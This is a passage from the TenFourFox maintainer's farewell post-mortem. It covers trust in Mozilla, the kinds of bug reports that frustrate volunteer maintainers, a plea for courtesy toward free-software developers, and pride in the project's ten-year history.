Gecko has a lot of technical baggage, but it is improving by leaps and bounds, and it is supported by an organization that has the Internet's best interests at heart. I have had an active Bugzilla account since 2004 and over those 16+ years I doubt I would have gotten the level of assistance or cooperation from anyone else that I've received from Mozilla employees and other volunteers. This is not to say that Mozilla (both MoFo and MoCo) has not made their blunders, or that I have agreed personally with everything they've done, and with respect to sustainability MoCo's revenues in particular are insufficiently diversified (speaking of black holes). But given my experience with other Mozillians and our shared values I would rather trust Mozilla any day with privacy and Web stewardship than, say, Apple, who understandably are only interested in what sells iDevices, and Google, who understandably are only interested in what improves the value proposition of their advertising platforms. And because Chrome and Chromium effectively represent the vast majority of desktop market share, Google can unilaterally drive standards and force everyone to follow. Monopolies, even natural ones, may be efficient but that doesn't make them benign. I'll always be a Firefox user for that reason and I still intend to continue contributing code.

Now for the mildly controversial part of this post and the one that will make a few people mad, but this is the end of TenFourFox, and a post-mortem must be comprehensive. For this reason I've chosen to disable comments on this entry. Here is what you should have learned from TenFourFox (much the same thing users should have learned from any open-source project where the maintainer eventually concluded it was more trouble than it was worth).

If you aren't paying for the software, then please don't be a jerk. There is a human at the other end of those complaints, and unless you have a support contract, that person owes you exactly nothing. Whining is exhausting to read, "doesn't work" reports are unavoidably depressing, disparaging or jokey comments are unkind, and making reports nastier or more insistent doesn't make your request more important. This is true whether or not your request is reasonable or achievable, but it's certainly more so when it isn't.

As kindly as I can put it, not all bug reports are welcome. Many are legitimately helpful and improve the quality of the browser, and I did appreciate the majority of the reports I got, but even helpful bug reports objectively mean more work for me, though it was work I usually didn't mind doing. Unfortunately, the unhelpful ones are at best annoying (and at worst incredibly frustrating) because they mean unhappy people with problems that may never be solvable.

The bug reports I liked least were the ones that complained about some pervasive, completely disabling flaw permeating the entire browser from top to bottom. Invariably this was that the browser "was slow," but startup crashes were probably a distant second place. The bug report would inevitably add something along the lines of this should be obvious, or talk about the symptom(s) as if everyone must be experiencing it (them).

I'm not doubting what people say they're seeing. But you should also consider that asserting the software has such a grave fault effectively alleges I either don't use the software or don't care about it, or I would have noticed. Most of the time my reply was to note that it was being written in the browser itself, and to point out that we had regular beta phases where the alleged issue had not surfaced, so no, it must not be that pervasive, and let's figure out why your computer behaves that way. As far as the browser being slow, well, that's part personal expectation and part technical differences. TenFourFox would regularly win benchmarks against other Power Mac browsers because its JavaScript JIT would stomp everything else, but its older Mozilla branch has weaker pixel-pushing and a DOM that is demonstrably slower than WebKit's, and no Power Mac browser is going to approach the performance you would get on an Intel Mac with any browser. Some of this is legitimate criticism, but overall if that's what you're expecting, TenFourFox will disappoint you. And it certainly did disappoint some people, who felt completely empowered to ignore all that context and say so.

Here is another unwelcome bug report, sometimes part of those same reports: "Version X+1 does something bad that Version X didn't, so I went back to Version X (or I've switched to another browser). Please let me know when it's fixed."

As a practical consideration, if you have such a serious issue that you can't use the browser for your desired purpose, then I guess you do what you gotta do. But consider you may also be saying that you don't care about solving the problem. Part of it is, like the last report, making the sometimes incorrect assumption that everyone else must be seeing what you're seeing. But the other part is that because you've already reverted to the previous release, you don't have any actual investment in the problem being solved. If it is a problem that can be fixed, and I do fix it, you're using the previous version and may or may not be in a position to test it. But if it's a problem I can't observe, then it won't get fixed, assuming it exists at all, because I don't see it on Version X+1 myself, and the person who can see it, i.e., you, has bailed out. If you want me to fix it, especially if you are unwilling or unable to fix it yourself, then you need to stick with it like I'm sticking with it.

What should you do? Phrase it better. Post your reports with the attitude that you are just one user, using free software, from the humility of your own personal experience on your own system. Make it clear you don't expect anything from the report, you are grateful the software exists, you intend to keep using it and this is your small way of giving back. Say this in words because I can't see your face or hear your voice. Write "thank you" and mean it. Acknowledge the costs in time and money to bring it to you. Tell me what's good about it and what you use it for. That's how you create a relationship where I can see you as a person and not a demand request, and where you can see me as a maintainer and not a vending machine. Value my work so that I can value your insights into it. Politeness, courtesy and understanding didn't go out the window just because we're interacting through a computer screen.

Goodness knows I haven't been perfect and I've lost my temper at times with people (largely justifiably, I think, but still). All of us are only human. But today, looking back on everything that's happened, I'm still proud of TenFourFox and I'm still glad I started working on it over 10 years ago. Here's the first functional build of Firefox 4.0b7pre on Tiger (what became the first beta of TenFourFox), dated October 15, 2010:

This was back when Mozilla was sending thank-you cards to Firefox 4 beta testers:

TenFourFox survived a lot of times when I thought it was finished for one technical reason or another, and it's still good enough for the couple thousand people who use it every day and the few thousand more who use it occasionally. It kept a lot of perfectly good hardware out of landfills. And most of all, it got me years more out of my own Quad G5 and iBook G4, and it still works well enough for the times I do still need it. Would I embark upon it again, knowing everything I know now and all the work and sweat that went into it? Heck yeah. In a heartbeat.

It was worth it.
